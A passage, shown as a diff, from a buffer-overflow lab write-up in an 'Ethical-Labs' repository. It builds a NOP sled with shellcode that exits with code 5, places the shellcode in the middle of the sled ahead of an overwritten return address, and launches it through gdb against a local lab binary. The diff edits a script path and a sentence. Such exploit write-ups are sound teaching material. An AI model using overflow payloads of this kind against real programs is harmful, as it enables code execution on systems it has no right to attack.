abdelazizSalah/Ethical-Labs/Buffer_Overflow/task2_write_up.md

     - building it in little indian formate:
         > 90909090909090909090909090909090909090909090909090909090909090909090909090909090909031c0b00131dbb305cd8038c8ffff
     - I found that some issues occurs when I add the payload at the end of the nop sled, so I decided to add the payload in the middle of the nop sled -> nop-sled + payload + nop sled + address_of_buffer -> it worked.

     - now we will find another issue that our input is treated as string not hex, and this is an issue, to solve it we need to use this command:
         * gdb --args ./build/bin/btu remove 1024 $(echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x01\x31\xdb\xb3\x05\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x38\xc8\xff\xff")
         * it just sets the arguments for the gdb call
         * then it sends the payload as hex using the command echo.
-        > notice that I created a python script to generate the payload in this formate for me you can find it at **Buffer_Overflow/echo_payload_generator.py**
+            - > you can find the python script to generate the payload at: **Buffer_Overflow/b-tu/task2_payload_generator.py**
         - this is how the stack pointer will look like after adding our payload
             - ![alt text](image-25.png)
-            - you may notice the bunch of zeros that are added below of the payload, and this is added by the program and that was the reason which causes problems if we added our payload at the end of the nop sled not at the begining. qui
+            - you may notice the bunch of zeros that are added below of the payload, and this is added by the program and that was the reason which causes problems if we added our payload at the end of the nop sled not at the begining.
     - then we will see that the program excuted our payload successfuly and the program exit with code 5 as shown in the screenshot:
         * ![alt text](image-22.png)